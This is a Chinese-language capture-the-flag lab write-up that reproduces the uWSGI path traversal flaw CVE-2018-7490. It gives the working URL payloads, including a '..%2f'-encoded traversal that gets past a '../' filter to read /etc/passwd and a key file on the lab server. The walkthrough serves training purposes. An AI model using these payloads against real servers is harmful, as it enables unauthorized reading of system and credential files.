墨者学院靶场之uWSGI漏洞复现(cve-2018-7490) – 作者:tqlyeyu

0x01 漏洞详情

uWSGI是一个Web服务器,它实现了WSGI协议、uwsgi、http等协议。Nginx中HttpUwsgiModule的作用是与uWSGI服务器进行交换。WSGI是一种Web服务器网关接口。它是一个Web服务器(如nginx,uWSGI等服务器)与web应用(如用Flask框架写的程序)通信的一种规范。uWSGI2.0.17之前版本中存在路径遍历漏洞,该漏洞源于程序没有正确的处理DOCUMENT_ROOT检测。攻击者可通过发送带有‘..’序列的特制URL请求利用该漏洞查看系统上的任意文件。

0x02 漏洞利用

首先访问漏洞地址http://219.153.49.228:47087/

image.png
可以看到使用了uWSGI服务器,这个题目的目的就是让我们学会使用cve编号去了解这个漏洞原理,然后利用。我们百度搜索cve-2018-7490

image.png

就可以看到网上一些人的文章。攻击者可以使用../路径遍历漏洞读取系统上的任意文件。

payload:http://219.153.49.228:47087/../../../../../etc/passwd

image.png

此时按下回车键出现下面的页面

image.png

可以看到../是被过滤了
此时看官方文档https://www.exploit-db.com/exploits/44223

image.png

也是告诉我们要使用..%2f的方式来进行攻击,我想原因是因为../这样的组合会被过滤,所以对/使用url编码的方式可以绕过。

payload:http://219.153.49.228:47087/..%2f..%2f..%2f..%2fetc/passwd

image.png

成功读取,根据提示我们来读取一下根目录的key.txt
image.png

payload:http://219.153.49.228:47087/..%2f..%2f..%2f..%2fkey.txt

image.png

成功读取到key值。

来源:freebuf.com 2021-03-14 12:49:20 by: tqlyeyu

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论